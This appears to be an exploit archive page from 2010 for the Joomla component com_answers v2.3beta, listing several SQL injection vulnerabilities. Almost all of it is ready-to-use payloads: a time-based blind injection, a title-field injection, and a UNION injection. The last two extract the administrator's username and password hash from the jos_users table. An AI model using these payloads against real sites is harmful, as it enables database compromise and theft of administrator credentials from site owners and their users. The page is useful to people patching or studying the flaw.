Home / os / win7

Joomla Component com_answers Multiple Vulnerabilities

Posted on 18 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Joomla Component com_answers Multiple Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================== Joomla Component com_answers Multiple Vulnerabilities ===================================================== # Exploit Title: Joomla Component Answers v2.3beta Multiple Vulnerabilities # Date: 25 May 2010 # Author: jdc # Software Link: http://extensions.joomla.org/extensions/communication/forum/12652 # Version: 2.3beta # Tested on: PHP5, MySQL5 Blind SQL Injection =================== Requires: magic_quotes OFF ?option=com_answers &amp;task=categ &amp;id=-1' union select benchmark(100000,md5(5)) as a -- ' Title Field SQL Injection ========================= title',(select concat(username,char(32),password) from jos_users where gid=25 limit 1),'0','1','0','','') -- ; SQL Injection ============= Requires: magic_quotes OFF, Joomla! debug OFF ?option=com_answers &amp;task=detail &amp;id=-1' union select concat(username,char(32),password),2,3,4,5,6,7,8,9 from jos_users where gid=25 limit 1 -- ' # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-18]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP